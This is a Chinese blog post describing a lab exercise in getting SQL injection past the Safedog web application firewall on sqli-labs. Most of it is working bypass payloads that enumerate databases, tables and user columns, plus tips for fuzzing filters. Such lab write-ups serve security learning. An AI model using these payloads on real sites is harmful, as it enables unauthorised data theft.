SQL注入绕waf(安全狗)

最新推荐文章于 2024-05-29 14:48:41 发布
最新推荐文章于 2024-05-29 14:48:41 发布
阅读量794 收藏 2
点赞数 1
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44302704/article/details/127707161
版权

SQL注入绕waf

前言:

感觉自己注入绕waf有点拉跨,于是自己搭建了一个环境练习绕waf

环境

我是用phpstudy+sql-lib+安全狗最新版本
在这里插入图片描述
正常访问
在这里插入图片描述
恶意语句,被拦截
在这里插入图片描述

注入检测

首先进行注入检测,判断是否有注入
?id=1’ 直接输入单引号不拦截
?id=1’ and 1=1 --+ 嘎
慢慢来看看它匹配到了啥

?id=1' and 1=1 --+  不拦截
?id=1' and --+ 不拦截
?id=1' and 123--+ 嘎

发现安全狗不单一拦截and,如果and后面有内容才拦截。
&& | 也都不行,尝试空格替换注释符和换行

?id=1’ and/**/1=1--+  嘎
?id=1’ and+1=1--+   嘎
?id=1’ and/**/1=1--+  嘎

但是注释符/**/里嵌套/任意字符/就可以绕过

?id=1' and /*/a/*/1=1--+ 成功

在这里插入图片描述
sleep函数

?id=1' and /*/aa/*/sleep/*/aa/*/(/*/aa/*/5/*/aa/*/)--+

在这里插入图片描述

联合注入

照葫芦画葫芦

?id=1' order/*/aa/*/by 4 --+

在这里插入图片描述

查看回显点

发现它不拦截union,也不拦截select,但是它两同时出现就嘎。
使用上面的方法也被拦截了
我把能插的空挡都插玩了
在这里插入图片描述

原语句:?id=-1' union select 1,2,3 --+ 嘎 
?id=-1' /*/aa/*/union/*/aa/*/select/*/aa/*/1/*/aa/*/,/*/aa/*/2/*/aa/*/,/*/aa/*/3/*/aa/*/--+ 嘎

联合查询使用括号把select和后面的语句括起来也是可以执行的
比如 union(select xxxx)

?id=-1' union/*/aa/*/(select 1,2,3) --+ 嘎
稍微添加一点
?id=-1' union/*/aa/*/(/*/aa/*/select 1,2,3) --+ 成功

在这里插入图片描述

?id=-1'  "%23"union%0aselect 1,2,3 --+    成功

在这里插入图片描述
查数据库

?id=-1' union/*/aa/*/(/*/aa/*/select 1,2,database(/*/aa/*/))--+
?id=-1' union/*/aa/*//*/aa/*/select 1,2,database(/*/aa/*/)--+
?id=-1' union/*/aa/*/(/*/aa/*/select 1,2,database/*!--+/*%0a()*/)--+

在这里插入图片描述

informaition_schema绕过

?id=-1' union/*/aa/*/all/*/aa/*/select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema='security'--+

之前在公众号文章看到的绕过informaition_schema的方法 也可以绕过
?id=-1' union/*/aaa/*/all/*/aaa/*/select 1,2,group_concat(table_name)from/*!--+/*%0ainformation_schema.tables */where table_schema='security'--+

/*!--+/*%0a*/

解释一下注释/*!*/ 中包括的内容是可以执行的
比如:
/*!information_schema.tables*/

?id=-1' union/*/aaa/*/all/*/aaa/*/select 1,2,group_concat(table_name)from/*!information_schema.tables*/where table_schema='security'--+

拆分一下 一个跨行注释/*!*/ 中间加个--+单行注释符,注释了后面的/*,为了避免后面的多行注释结尾*/被闭合被注释掉使用%0a进行换行
在这里插入图片描述

?id=-1' union/*/aaa/*/(/*/aaa/*/select 1,2,group_concat(column_name)from/*!--+/*%0ainformation_schema.columns */where table_name='users')--+

在这里插入图片描述

总结:

  1. 绕sqlwaf的时候我是一点一点输入然后请求的,这样就能知道是哪里出了问题然后再绕过之后再慢慢输入
    比如
    ?id=1 union 发送请求不拦截
    ?id=1 union select 拦截 呢我就停下了先把这绕了
    然后再慢慢的输入完所有语句
  2. 安全狗在对内联注释方面处理的还是有点不行,普通的内敛注释中间加点垃圾字符多试试。
qweqweqqqqqqqqqq
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入安全狗4.0
Bu2n的博客
02-07 5249
1.前言2.前置知识3.过关键字主要思路3.1过连体关键字思路3.2过单个关键字思路4.以sqli-labs(Less-1)为例,安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
SQL注入WAF小结
05-08
### SQL注入WAF小结 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL语句来获取敏感数据、修改数据或执行其他非法操作。随着网络安全技术的发展,Web应用防火墙...
SQL注入过最新安全狗WAF中学习fuzz
quan9i的博客
06-11 995
声明:文章首发于先知社区
记一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1253
实战注入的难度比靶场大得多,各种过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
SQL注入如何WAF
qq_55213436的博客
07-15 1383
不知道各位在平时的sql注入漏洞挖掘的过程中是否经常会遇到这样那样版本的安全狗,虽然说安全狗十分的可恶。今天就分享几种常见的安全狗过方法,亲测有效。特别是最后两种方法,100%过最新版本的安全狗。.........
web安全-SQL注入-认识安全狗-WAF过常用方法以及示例
ran的博客
01-20 1676
特殊符号%00,部分 waf 遇到%00 截断,只能获取到前面的参数,无法获取到后面的有害参数输 入 , 从 而 导 致 Bypass。select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin。mysql 注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格)// -- --+ # /**/ + :%00 /!Hex() bin() 等价于 ascii()
WAF学习之漏洞学习——SQL注入
weixin_38719347的博客
03-05 487
文章目录DVWA/SQL Injection/low场景源码原理注入示例猜解数据库验证注入点的判断 参考sql注入基础原理 DVWA/SQL Injection/low 场景 : 源码 source: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]...
SQL注入安全狗的五种方法
01-11 1318
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
sql注入过方法总结
12-19
sql注入过方法总结,waf,D盾
深入了解SQL注入waf和过滤机制
02-11
"深入了解SQL注入waf和过滤机制" SQL 注入WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
SQL注入中的WAF过技术
08-19
SQL注入中的WAF过技术,里面的思路很好,可以学习一下
mysql特性安全狗_安全狗新版进行SQL注入
weixin_39641738的博客
02-28 192
前言在圈子见到某师傅过了安全狗然后注入,然后自己手痒也搭了个环境进行测试。期间搭建环境各种坑….不过后面还是有个不错的结果的正文首先我是用phpstudy+安全狗4.0搭建的环境一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)解决方法:以管理员权限运行cmd,进入apache/bin目录httpd -k install -n apache2.4以管理员权限运行cmd,进入mys...
SQL注入过safedog原理分析(二)
永远是少年
08-13 754
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入过safedog的姿势及原理。 一、过payload与结果 二、payload分析 三、写在最后
SQL注入
2302_79556885的博客
03-08 363
preg_match(‘/ /’,$_GET[“id”])源码利用正则匹配对空格过滤。
SQL注入安全狗
blackguest07的博客
01-12 2320
SQL注入安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
sql注入篇--WAF
qq_51003021的博客
08-12 2073
针对WAF
sql注入及其waf
最新发布
06-07
为了防止SQL注入攻击,Web应用程序通常会使用一些安全措施,例如WAF(Web应用程序防火墙)。 WAF是一个位于Web应用程序和互联网之间的设备或软件,用于监视和过滤Web应用程序的输入和输出流量,以保护Web应用程序免...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值